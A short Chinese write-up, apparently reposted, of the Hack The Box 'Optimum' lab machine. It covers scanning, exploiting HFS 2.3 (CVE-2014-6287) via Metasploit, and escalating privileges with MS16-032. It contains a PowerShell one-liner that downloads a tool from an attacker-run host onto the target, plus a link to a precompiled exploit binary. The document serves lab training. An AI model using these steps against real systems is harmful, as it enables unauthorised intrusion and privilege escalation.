[Hack The Box]靶机8 Optimum
Posted huamanggg
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[Hack The Box]靶机8 Optimum相关的知识,希望对你有一定的参考价值。
nmap直接开漏扫,发现cve-2011-3192,没啥用,开了80端口,去看看
打开是HFS,nmap扫出来是HFS2.3
这个版本的HFS是有cve的
https://nvd.nist.gov/vuln/detail/CVE-2014-6287
msf有这个模块
直接拿下shell
拿到user.txt
进不了admin,需要提权
本地起一个python服务,把winpeas传上去
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.4:8000/winPEASx64.exe', '.\\winPEASx64.exe')"
好像没啥信息的
用一下Windows-Exploit-Suggester来测一下没打的补丁
systeminfo拿一下系统的信息
找到很多,这里就拿MS16-032来打吧
找一个payload
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
传上去执行,成功拿到
以上是关于[Hack The Box]靶机8 Optimum的主要内容,如果未能解决你的问题,请参考以下文章